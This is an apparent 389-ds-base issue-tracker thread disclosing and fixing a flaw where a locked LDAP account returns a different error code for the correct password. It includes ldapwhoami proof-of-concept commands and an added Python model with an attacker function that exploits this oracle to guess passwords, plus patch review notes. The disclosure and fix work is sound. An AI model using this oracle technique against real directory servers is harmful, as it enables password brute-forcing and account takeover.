The directory server password lockout policy prevents binds from operating once a threshold of failed passwords has been met. During this lockout, if you bind with a successful password, a different error code is returned. This means that an attacker has no rate limit or penalty during an account lock, and can continue to attempt passwords via brute force.
Proof of concept:

    ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password
    dn: uid=testuser,dc=example,dc=com

Bind with invalid credentials a number of times to trigger the lockout:

    ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w passworda
    ldap_bind: Invalid credentials (49)

Then bind with valid credentials while the lockout is in effect:

    ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password
    ldap_bind: Constraint violation (19)
        additional info: Exceed password retry limit. Please try later.
Workaround: Use PBKDF2_SHA256 to delay the rate at which an attacker can attempt binds. Limit the number of threads allowed to anonymous.
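The following is an added model of the oracle described in the report, written for this page; it is not code from 389-ds-base and not the fix that was committed. It assumes a lockout threshold of three failures and assumes that a fix answers the lockout state before the password is consulted, so that a locked account returns one result code whether or not the password is correct. The attacker function shows why the distinct code matters: it first locks the account, then flags any candidate whose result code differs from the code a guaranteed-wrong password receives. Passwords are stored with PBKDF2_SHA256, as in the suggested workaround, which slows each guess but does not remove the oracle.

```python
import hashlib
import hmac
import os

# LDAP result codes as they appear in the ldapwhoami output above
LDAP_SUCCESS = 0
LDAP_CONSTRAINT_VIOLATION = 19   # "Exceed password retry limit"
LDAP_INVALID_CREDENTIALS = 49
LOCKOUT_THRESHOLD = 3            # assumed passwordMaxFailure value for this model


class Account:
    """In-memory stand-in for a directory entry with a PBKDF2_SHA256 password."""

    def __init__(self, dn, password, iterations=2000):
        self.dn = dn
        self.salt = os.urandom(16)
        self.iterations = iterations
        self.pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, iterations)
        self.retry_count = 0
        self.locked = False

    def check_password(self, candidate):
        digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), self.salt, self.iterations)
        return hmac.compare_digest(digest, self.pw_hash)

    def record_failure(self):
        self.retry_count += 1
        if self.retry_count >= LOCKOUT_THRESHOLD:
            self.locked = True


def bind_vulnerable(acct, password):
    """Ordering that produces the oracle: password is verified first, lockout second."""
    if not acct.check_password(password):
        acct.record_failure()
        return LDAP_INVALID_CREDENTIALS
    if acct.locked:
        return LDAP_CONSTRAINT_VIOLATION   # only a correct password reaches this code
    acct.retry_count = 0
    return LDAP_SUCCESS


def bind_fixed(acct, password):
    """Assumed hardened ordering: lockout is answered before the password is looked at."""
    if acct.locked:
        return LDAP_CONSTRAINT_VIOLATION   # same code for right and wrong passwords
    if not acct.check_password(password):
        acct.record_failure()
        return LDAP_INVALID_CREDENTIALS
    acct.retry_count = 0
    return LDAP_SUCCESS


def lockout_oracle_attack(bind, acct, wordlist):
    """Attacker's view: lock the account, then report every candidate whose
    result code differs from the code a guaranteed-wrong password receives."""
    for _ in range(LOCKOUT_THRESHOLD):
        bind(acct, os.urandom(8).hex())           # wrong by construction, triggers the lock
    baseline = bind(acct, os.urandom(8).hex())    # code a wrong password gets while locked
    return [pw for pw in wordlist if bind(acct, pw) != baseline]


def demo(bind):
    """Run the attack against a fresh account using a constructed sample wordlist."""
    acct = Account("uid=testuser,dc=example,dc=com", "password")
    wordlist = ["123456", "hunter2", "password", "letmein"]
    return lockout_oracle_attack(bind, acct, wordlist)


if __name__ == "__main__":
    print("vulnerable ordering leaks:", demo(bind_vulnerable))   # ['password']
    print("fixed ordering leaks:     ", demo(bind_fixed))        # []
```

Against the vulnerable ordering the attacker learns the password from the 19-versus-49 difference while the account is nominally locked; against the fixed ordering every attempt during the lock returns the same code, so the wordlist yields nothing and the lock actually delays the attacker.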
Metadata Update from @firstyear: - Custom field component adjusted to None - Custom field origin adjusted to None - Custom field reviewstatus adjusted to None - Custom field type adjusted to None - Custom field version adjusted to None
Metadata Update from @firstyear: - Issue assigned to firstyear - Issue priority set to: critical - Issue tagged with: Security
Attachment: 0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch
Passes all password tests: 28 passed in 165.95 seconds
Metadata Update from @firstyear: - Custom field reviewstatus adjusted to review (was: None)
The patch looks good to me. Ack
Metadata Update from @tbordaz: - Custom field reviewstatus adjusted to ack (was: review)
commit 33db32a
To ssh://git@pagure.io/389-ds-base.git
   58c4f95..33db32a  master -> master
Attachment: 0001-Ticket-49336-SECURITY-1.2.11.x-Locked-account-provid.patch
I'll need some help testing this one from @vashirov or @spichugi as I have some issues with the 1.2.x env setup :(
Attachment: 0001-Ticket-49336-SECURITY-1.3.5.x-Locked-account-provide.patch
passes the security test.
Attachment: 0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch
This is the 1.3.6 patch.
Metadata Update from @firstyear: - Custom field reviewstatus adjusted to review (was: ack)
> I'll need some help testing this one from @vashirov or @spichugi as I have some issues with the 1.2.x env setup :(

Test passed for the scratch build: https://vashirov.fedorapeople.org/share/report-1.2.11.15-92.html
Thanks @vashirov you are a legend.
@tbordaz can you check the backports? Are you okay for me to add these to the listed versions?
@tbordaz @mreynolds Can you check these backports?
Ack on the 1.3.5 & 1.3.6 backports (we need to get the 1.3.6 patch pushed ASAP). And I'm not sure we need the 1.2.11 patch.
Pushed the 1.3.6 patch:
c903f66..95b39e2 389-ds-base-1.3.6 -> 389-ds-base-1.3.6
Thanks @mreynolds I'll push the 1.3.5 and master patches now.
commit 4cce166
To ssh://git@pagure.io/389-ds-base.git
   faaa62c..4cce166  389-ds-base-1.3.5 -> 389-ds-base-1.3.5
Metadata Update from @firstyear: - Issue close_status updated to: fixed - Issue status updated to: Closed (was: Open)
389-ds-base is moving from Pagure to Github. This means that new issues and pull requests will be accepted only in 389-ds-base's github repository.
This issue has been cloned to Github and is available here: - https://github.com/389ds/389-ds-base/issues/2395
If you want to receive further updates on the issue, please navigate to the github issue and click on subscribe button.
Thank you for understanding. We apologize for all inconvenience.
Metadata Update from @spichugi: - Issue close_status updated to: wontfix (was: fixed)